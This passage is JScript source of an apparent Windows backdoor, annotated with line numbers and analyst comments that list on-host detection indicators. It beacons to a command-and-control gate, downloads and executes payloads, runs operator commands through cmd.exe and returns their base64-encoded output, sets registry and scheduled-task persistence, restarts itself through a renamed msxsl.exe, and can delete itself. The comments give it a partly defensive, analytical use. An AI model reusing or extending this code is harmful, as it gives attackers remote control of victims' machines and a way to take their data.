} else {
1845
path1 += "\\System32\\" + Mitm_exe;
1846
}
1847
switch (xEntryP) {
1848
case "1":
1849
cCommand = " /s /i ";
1850
break;
1851
case "2":
1852
cCommand = " /s /n /i ";
1853
break;
1854
case "3":
1855
cCommand = " /s /u ";
1856
break;
1857
default:
1858
cCommand = " /s /i ";
1859
}
1860
path1 += cCommand + dq + Final + dq;
1861
cCommand = "";
1862
ret6 = wmi_command(path1, 0);
1863
path1 = "";
1864
if (ret6 == true) {
1865
ret2 = "OK";
1866
} else {
1867
ret2 = "E";
1868
}
1869
} else {
1870
ret2 = "E";
1871
}
1872
}
1873
} else {
1874
ret2 = "E";
1875
}
1876
} else {
1877
ret2 = "E";
1878
}
1879
} else {
1880
ret2 = "E";
1881
}
1882
}
1883
};
1884
try {
1885
con2.send();
1886
} catch (e5) {
1887
return "E";
1888
}
1889
return ret2;
1890
}
1891
1892
function rev_cmd(xCo) {
// Runs an operator-supplied command line for the "more_time" task and returns its
// combined stdout/stderr as a string, or "0" on failure / empty output.
//   xCo  command text; executed as `cmd /v /c <xCo> > "<%TMP%\tempNow()>" 2>&1`
//        through wmi_command (defined elsewhere), then the temp file is read
//        with FileSystemObject and deleted with dFile().
// Blank lines are stripped from the captured output before it is returned.
// Detection note: cmd.exe with "/v /c" and "2>&1" redirecting into %TMP%, spawned
// from a script host, is the observable artifact of every remote-shell task.
1893
var fso3;
1894
var rFile = "";
1895
var file6;
1896
var vStr;
1897
var rt1;
1898
try {
1899
if (xCo) {
1900
rFile = xTmp + tempNow();
1901
rt1 = wmi_command("cmd /v /c " + xCo + ' > "' + rFile + '" 2>&1', 1);
1902
if (rt1 == false) {
1903
dFile(rFile);
1904
return "0";
1905
}
1906
if (fexist(rFile) === true) {
1907
fso3 = obj("Scripting.FileSystemObject");
1908
// OpenTextFile(path, 1 = ForReading, 0 = do not create).
file6 = fso3.OpenTextFile(rFile, 1, 0);
1909
if (file6.AtEndOfStream === false) {
1910
vStr = file6.ReadAll();
1911
}
1912
file6.Close();
1913
dFile(rFile);
1914
} else {
1915
return "0";
1916
}
1917
} else {
1918
return "0";
1919
}
1920
} catch (eg1) {
1921
return "0";
1922
}
1923
try {
1924
if (vStr) {
1925
// Remove whitespace-only lines (CRLF or LF terminated).
vStr = vStr.replace(/^\s*$(?:\r\n?|\n)/gm, "");
1926
return vStr;
1927
} else {
1928
return "0";
1929
}
1930
} catch (eg2) {
1931
return "0";
1932
}
1933
}
1934
// Shared state for the task handler and the beacon loop:
//   mainCommand  last msxsl.exe re-launch command line (set in eTask "more_onion" and main()).
//   fCore        path of the stored core script (workingDir + <name> + ".txt", set in check_inside()).
//   fStart       path of the stored start script (workingDir + <name> + ".txt", set in check_inside()).
var mainCommand = "";
1935
var fCore = "";
1936
var fStart = "";
1937
1938
function eTask(fullTask) {
// Dispatches one task line received from the gate (main() passes any hit_Gate()
// reply that is neither "OK" nor "gErr").
// Task layout, split on "|": [1] type, [2] task id, [3] link/command, [4] PE type,
// [5] regsvr32 entry-point selector (only when 8 fields are present).
// Types handled by the switch below:
//   "d&exec"     [3] is "url,key"; calls dExec() once, and once more after
//                wmi_waitfor2(1, 0) if the first attempt did not return "OK".
//   "gtfo"       removes persistence: the Run-key value named by the stored uName,
//                rootK\Environment\UserInitMprLogonScript, the Notepad store value
//                (xStore), the fCore/fStart files and -- when SYSTEM === 1 -- the
//                scheduled task uName; on success sets gtfo and selfdel so main()
//                exits and deletes main_mitm.
//   "more_onion" re-launches the core via main_mitm (msxsl.exe), passing fCore as
//                both arguments; on success sets gtfo so the current instance stops.
//   "via_c"      runs `cmd /v /c <[3]> & exit` without capturing output.
//   "more_time"  runs [3] through rev_cmd() and reports base64(output) and base64(command).
// Every branch reports back with hit_Gate(Gate, PreserveH + "|" + <state> + "|" + tID, 0, 0).
// Detection note: the registry locations named here (Run key value, the
// UserInitMprLogonScript environment value, HKCU/HKLM\Software\Microsoft\Notepad\<name>)
// and SCHTASKS /Delete are the persistence artifacts to hunt for.
1939
if (fullTask) {
1940
var eState = "0";
1941
var TaskReply;
1942
var x1;
1943
var Note;
1944
var Sp;
1945
var tURL;
1946
var fPasw;
1947
var flink;
1948
var ret77;
1949
var tPE;
1950
var dq2 = "";
1951
var UniqKey = "";
1952
var reg1 = "";
1953
var uName = "";
1954
var r_sh = "";
1955
var ret4;
1956
var startPoint;
1957
var pieces = fullTask.split("|");
1958
var count1 = pieces.length;
1959
if (count1 >= 5) {
1960
var tType = pieces[1];
1961
var tID = pieces[2];
1962
switch (tType) {
1963
case "d&exec":
1964
if (count1 >= 7) {
1965
flink = pieces[3];
1966
tPE = pieces[4];
1967
if (!tPE) {
1968
tPE = "exe";
1969
}
1970
if (flink) {
1971
if (flink.indexOf(",") !== -1) {
1972
Sp = flink.split(",");
1973
tURL = Sp[0];
1974
fPasw = Sp[1];
1975
// startPoint stays undefined unless exactly 8 fields were sent.
if (count1 === 8) {
1976
startPoint = pieces[5];
1977
}
1978
if (tURL && fPasw) {
1979
if (dExec(tURL, fPasw, tPE, startPoint) === "OK") {
1980
eState = "1";
1981
} else {
1982
wmi_waitfor2(1, 0);
1983
if (dExec(tURL, fPasw, tPE, startPoint) === "OK") {
1984
eState = "1";
1985
}
1986
}
1987
}
1988
}
1989
}
1990
}
1991
TaskReply = PreserveH + "|" + eState + "|" + tID;
1992
hit_Gate(Gate, TaskReply, 0, 0);
1993
break;
1994
case "gtfo":
1995
reg1 = rootK + "\\Environment\\UserInitMprLogonScript";
1996
try {
1997
x1 = obj("WScript.Shell");
1998
} catch (er78) {
1999
x1 = false;
2000
}
2001
if (x1) {
2002
try {
2003
// The store value holds "<runkey name>,<core>,<start>" (see check_inside()).
if (rexist(xStore) === true) {
2004
Note = x1.RegRead(xStore);
2005
if (Note && Note.indexOf(",") !== -1) {
2006
Sp = Note.split(",");
2007
uName = Sp[0];
2008
UniqKey = rootK + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + uName;
2009
}
2010
}
2011
} catch (e104) {
2012
UniqKey = "";
2013
}
2014
try {
2015
if (UniqKey && rexist(UniqKey) === true) {
2016
x1.RegDelete(UniqKey);
2017
}
2018
} catch (e80) {
2019
UniqKey = "";
2020
}
2021
try {
2022
if (reg1 && rexist(reg1) === true) {
2023
x1.RegDelete(reg1);
2024
ret77 = "1";
2025
}
2026
} catch (e81) {
2027
ret77 = "0";
2028
}
2029
try {
2030
if (xStore && rexist(xStore) === true) {
2031
x1.RegDelete(xStore);
2032
ret77 = "1";
2033
}
2034
// Catch identifier e84 is reused by a later handler in this case; legal in JScript.
} catch (e84) {
2035
if (ret77 !== "1") {
2036
ret77 = "0";
2037
}
2038
}
2039
try {
2040
if (fexist(fCore) === true) {
2041
dFile(fCore);
2042
ret77 = "1";
2043
}
2044
} catch (e82) {
2045
if (ret77 !== "1") {
2046
ret77 = "0";
2047
}
2048
}
2049
try {
2050
if (fexist(fStart) === true) {
2051
dFile(fStart);
2052
ret77 = "1";
2053
}
2054
} catch (e83) {
2055
if (ret77 !== "1") {
2056
ret77 = "0";
2057
}
2058
}
2059
try {
2060
if (uName && SYSTEM === 1) {
2061
ret4 = wmi_command("SCHTASKS.exe /Delete /TN " + uName + " /F", 1);
2062
}
2063
// ret4 is undefined when the branch above was skipped, so this is false then.
if (ret4 == true) {
2064
ret77 = "1";
2065
}
2066
} catch (e84) {
2067
if (ret77 !== "1") {
2068
ret77 = "0";
2069
}
2070
}
2071
} else {
2072
ret77 = "0";
2073
}
2074
if (!ret77) {
2075
ret77 = "0";
2076
}
2077
hit_Gate(Gate, PreserveH + "|" + ret77 + "|" + tID, 0, 0);
2078
if (ret77 === "1") {
2079
gtfo = true;
2080
selfdel = true;
2081
}
2082
break;
2083
case "more_onion":
2084
try {
2085
if (fexist(fCore) === true) {
2086
dq2 = '"';
2087
// "<main_mitm>" "<fCore>" "<fCore>" -- same command main() uses for the restart cycle.
mainCommand = dq2 + main_mitm + dq2 + " " + dq2 + fCore + dq2 + " " + dq2 + fCore + dq2;
2088
ret4 = wmi_command(mainCommand, 0);
2089
if (ret4 == true) {
2090
ret77 = "1";
2091
} else {
2092
ret77 = "0";
2093
}
2094
} else {
2095
ret77 = "0";
2096
}
2097
} catch (e1672) {
2098
ret77 = "0";
2099
}
2100
hit_Gate(Gate, PreserveH + "|" + ret77 + "|" + tID, 0, 0);
2101
if (ret77 === "1") {
2102
gtfo = true;
2103
}
2104
break;
2105
case "via_c":
2106
if (count1 === 6) {
2107
flink = pieces[3];
2108
if (flink) {
2109
ret4 = wmi_command("cmd /v /c " + flink + " & exit", 0);
2110
if (ret4 == true) {
2111
eState = "1";
2112
} else {
2113
eState = "0";
2114
}
2115
// Redundant: eState is always "0" or "1" at this point.
if (!eState) {
2116
eState = "0";
2117
}
2118
TaskReply = PreserveH + "|" + eState + "|" + tID;
2119
hit_Gate(Gate, TaskReply, 0, 0);
2120
}
2121
}
2122
break;
2123
case "more_time":
2124
if (count1 === 6) {
2125
flink = pieces[3];
2126
if (flink) {
2127
r_sh = rev_cmd(flink);
2128
if (r_sh) {
2129
// rev_cmd() returns "0" on failure; only real output is base64-encoded.
if (r_sh !== "0") {
2130
r_sh = base64_encode(r_sh);
2131
}
2132
} else {
2133
r_sh = "0";
2134
}
2135
TaskReply = PreserveH + "|" + r_sh + "|" + tID + "|" + base64_encode(flink);
2136
r_sh = "";
2137
hit_Gate(Gate, TaskReply, 0, 0);
2138
}
2139
}
2140
break;
2141
}
2142
}
2143
}
2144
}
2145
2146
function main() {
// One iteration of the beacon loop (called from go() after the network and host
// checks pass). Steps:
//   1. Lazily build the host fingerprint (PreserveH) and the registry store path
//      (xStore = rootK\Software\Microsoft\Notepad\<PCN when SYSTEM, else UNM>).
//   2. Count the iteration; once rcon_now reaches rcon_max (derived from restart_h
//      in the header) re-launch the core through main_mitm (msxsl.exe) and set gtfo
//      so this instance stops -- a periodic self-restart.
//   3. Otherwise POST the fingerprint to Gate; "gErr" -> wait error_retry,
//      "OK" -> nothing, any other reply -> eTask().
//   4. Sleep hit_each via wmi_waitfor(), or -- when a "gtfo" task succeeded --
//      delete main_mitm with `cmd.exe /c del`.
// Detection note: the periodic msxsl.exe launch with a .txt file as both arguments
// and the cmd.exe del of msxsl.exe under %APPDATA%\Microsoft\ are host artifacts.
2147
var dq2 = '"';
2148
var HitNow = "";
2149
var ret8;
2150
if (PreserveH === "") {
2151
PreserveH = bot_header();
2152
}
2153
if (xStore === "") {
2154
var valo = "\\Software\\Microsoft\\Notepad\\";
2155
if (SYSTEM === 1) {
2156
xStore = rootK + valo + PCN;
2157
} else {
2158
xStore = rootK + valo + UNM;
2159
}
2160
}
2161
rcon_now += 1;
2162
if (rcon_now >= rcon_max) {
2163
try {
2164
if (fexist(fCore) === true) {
2165
mainCommand = dq2 + main_mitm + dq2 + " " + dq2 + fCore + dq2 + " " + dq2 + fCore + dq2;
2166
ret8 = wmi_command(mainCommand, 0);
2167
if (ret8 == true) {
2168
gtfo = true;
2169
} else {
2170
// The trailing "2" is a stray numeric-literal expression statement (no effect);
// it looks like a hand-editing artifact in this sample.
gtfo = false;2
2171
}
2172
}
2173
} catch (ez12) {
2174
gtfo = false;
2175
}
2176
} else {
2177
HitNow = hit_Gate(Gate, PreserveH, 1, 0);
2178
switch (HitNow) {
2179
case "gErr":
2180
wmi_waitfor(error_retry);
2181
break;
2182
case "OK":
2183
break;
2184
default:
2185
eTask(HitNow);
2186
}
2187
}
2188
if (gtfo === false) {
2189
wmi_waitfor(hit_each);
2190
} else {
2191
if (selfdel === true && fexist(main_mitm) === true) {
2192
wmi_command('cmd.exe /c del "' + main_mitm + dq2, 0);
2193
}
2194
}
2195
}
2196
2197
function go() {
// Entry into the beacon: runs main() only when both connectivity (check_Net, which
// probes a w3.org URL) and the C2 host (check_Host, defined elsewhere) are reachable.
// On failure it sleeps via wmi_waitfor2() -- 3 units when there is no network,
// hit_each units when the gate host is down -- rather than exiting.
2198
if (check_Net(0) === true) {
2199
if (check_Host(0) === true) {
2200
main();
2201
} else {
2202
wmi_waitfor2(hit_each, 1);
2203
}
2204
} else {
2205
wmi_waitfor2(3, 1);
2206
}
2207
}
2208
2209
function check_inside() {
// Verifies that this host carries a prior installation and loads its file paths.
// Fills PCN/UNM from WScript.Network, derives the store value path
// xStore = rootK + "\Software\Microsoft\Notepad\" + (PCN when SYSTEM === 1, else UNM),
// and reads it. The value must be "name,core,start" (three comma fields); the last
// two become fCore/fStart = workingDir + <field> + ".txt", and all of fCore, fStart
// and main_mitm must exist on disk for the function to return true.
// If the registry read throws while SYSTEM === 1, the globals are re-pointed at the
// HKCU / %APPDATA% locations and the check is retried once (SYSTEM is set to 0 first,
// so the recursion terminates).
// Detection note: a REG_SZ value under HKCU or HKLM \Software\Microsoft\Notepad\
// named after the user or computer and holding three comma-separated tokens, plus
// .txt files next to msxsl.exe in %APPDATA%\Microsoft\, are the on-host indicators.
2210
var x1;
2211
var Note;
2212
var Sp;
2213
var net;
2214
if ((UNM === "") || (PCN === "")) {
2215
try {
2216
net = obj('WScript.Network');
2217
PCN = net.ComputerName;
2218
UNM = net.UserName;
2219
} catch (e781) {
2220
PCN = "pc_error";
2221
UNM = "user_error";
2222
}
2223
}
2224
if (xStore === "") {
2225
var valo = "\\Software\\Microsoft\\Notepad\\";
2226
if (SYSTEM === 1) {
2227
xStore = rootK + valo + PCN;
2228
} else {
2229
xStore = rootK + valo + UNM;
2230
}
2231
}
2232
try {
2233
x1 = obj("WScript.Shell");
2234
// RegRead throws when the value does not exist -> handled below.
Note = x1.RegRead(xStore);
2235
if (Note) {
2236
if (Note.indexOf(",") !== -1) {
2237
Sp = Note.split(",");
2238
if (Sp.length === 3) {
2239
fCore = workingDir + Sp[1] + ".txt";
2240
fStart = workingDir + Sp[2] + ".txt";
2241
if (fexist(fCore) === false) {
2242
return false;
2243
}
2244
if (fexist(fStart) === false) {
2245
return false;
2246
}
2247
if (fexist(main_mitm) === false) {
2248
return false;
2249
}
2250
return true;
2251
} else {
2252
return false;
2253
}
2254
} else {
2255
return false;
2256
}
2257
} else {
2258
return false;
2259
}
2260
} catch (e89) {
2261
if (SYSTEM === 1) {
2262
// Fall back from the machine-wide install location to the per-user one.
SYSTEM = 0;
2263
rootK = "HKCU";
2264
xApp = myEnv("APPDATA", 0);
2265
workingDir = xApp + "\\Microsoft\\";
2266
main_mitm = workingDir + "msxsl.exe";
2267
xStore = "";
2268
return check_inside();
2269
} else {
2270
return false;
2271
}
2272
}
2273
}
2274
2275
function sys() {
// Privilege probe: tries to read HKEY_USERS\S-1-5-19\Environment\TEMP via
// WScript.Shell. S-1-5-19 is the well-known SID of NT AUTHORITY\LOCAL SERVICE;
// reading another account's hive is presumably only possible from an elevated /
// SYSTEM-level context, which is how the caller uses the result (it sets the
// global SYSTEM = 1 and switches to HKLM). Returns true only when the read
// succeeds with a non-empty value; any exception yields false.
2276
var sh11;
2277
var tez = "";
2278
var sys123 = "HKEY_USERS\\S-1-5-19\\Environment\\TEMP";
2279
try {
2280
sh11 = obj("WScript.Shell");
2281
tez = sh11.RegRead(sys123);
2282
if (tez) {
2283
return true;
2284
} else {
2285
return false;
2286
}
2287
} catch (e181) {
2288
return false;
2289
}
2290
}
2291
// Bootstrap: pick the install context, derive the working paths, then start the
// beacon only if a prior installation is present on this host.
//   elevated (sys() true)  -> SYSTEM = 1, rootK = "HKLM", xApp = sFolder(35)
//                             (sFolder is defined elsewhere; 35 is CSIDL_COMMON_APPDATA,
//                             i.e. %ProgramData%), falling back to %APPDATA%.
//   otherwise              -> xApp = %APPDATA%.
// workingDir = xApp\Microsoft\, main_mitm = workingDir\msxsl.exe, xTmp = %TMP%\.
// Nothing runs on a host where check_inside() fails (the script exits silently),
// so this listing is the resident "core" component, not the initial dropper.
// Detection note: msxsl.exe (the Microsoft XSLT command-line tool) living in
// %APPDATA%\Microsoft\ or %ProgramData%\Microsoft\ is a strong on-host indicator.
if (sys() === true) {
2292
SYSTEM = 1;
2293
rootK = "HKLM";
2294
xApp = sFolder(35);
2295
if (xApp === false) {
2296
xApp = myEnv("APPDATA", 0);
2297
}
2298
} else {
2299
xApp = myEnv("APPDATA", 0);
2300
}
2301
xTmp = myEnv("TMP", 0) + "\\";
2302
workingDir = xApp + "\\Microsoft\\";
2303
main_mitm = workingDir + "msxsl.exe";
2304
// Loose equality with true; check_inside() returns a real boolean.
if (check_inside() == true) {
2305
go();
2306
}